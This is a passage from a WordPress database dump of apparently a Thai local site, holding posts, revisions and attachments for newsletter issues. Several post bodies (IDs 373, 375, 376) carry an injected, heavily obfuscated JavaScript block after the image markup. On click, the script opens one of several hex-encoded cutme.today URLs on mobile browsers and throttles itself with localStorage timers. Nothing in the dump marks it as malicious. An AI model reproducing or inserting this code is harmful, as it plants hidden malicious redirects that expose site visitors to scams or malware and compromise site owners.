)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร2-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a32-67','','','2024-08-01 20:31:38','2024-08-01 13:31:38','',0,'http://pakhaeng.ssk.in.th/?p=373',0,'post','',0),
(374,1,'2024-08-01 20:26:29','2024-08-01 13:26:29','','2-67','','inherit','','closed','','2-67','','','2024-08-01 20:26:29','2024-08-01 13:26:29','',373,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-67.png',0,'attachment','image/png',0),
(375,1,'2024-08-01 20:26:53','2024-08-01 13:26:53','<!-- wp:image {\"id\":374,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-67-725x1024.png\" alt=\"\" class=\"wp-image-374\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร2-67','','inherit','closed','closed','','373-revision-v1','','','2024-08-01 20:26:53','2024-08-01 13:26:53','',373,'http://pakhaeng.ssk.in.th/?p=375',0,'revision','',0),
(376,1,'2024-08-01 20:27:41','2024-08-01 13:27:41','<!-- wp:image {\"id\":377,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/3-67-725x1024.png\" alt=\"\" class=\"wp-image-377\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร3-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a33-67','','','2024-08-01 20:30:52','2024-08-01 13:30:52','',0,'http://pakhaeng.ssk.in.th/?p=376',0,'post','',0),
(377,1,'2024-08-01 20:27:29','2024-08-01 13:27:29','','3-67','','inherit','','closed','','3-67','','','2024-08-01 20:27:29','2024-08-01 13:27:29','',376,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/3-67.png',0,'attachment','image/png',0),
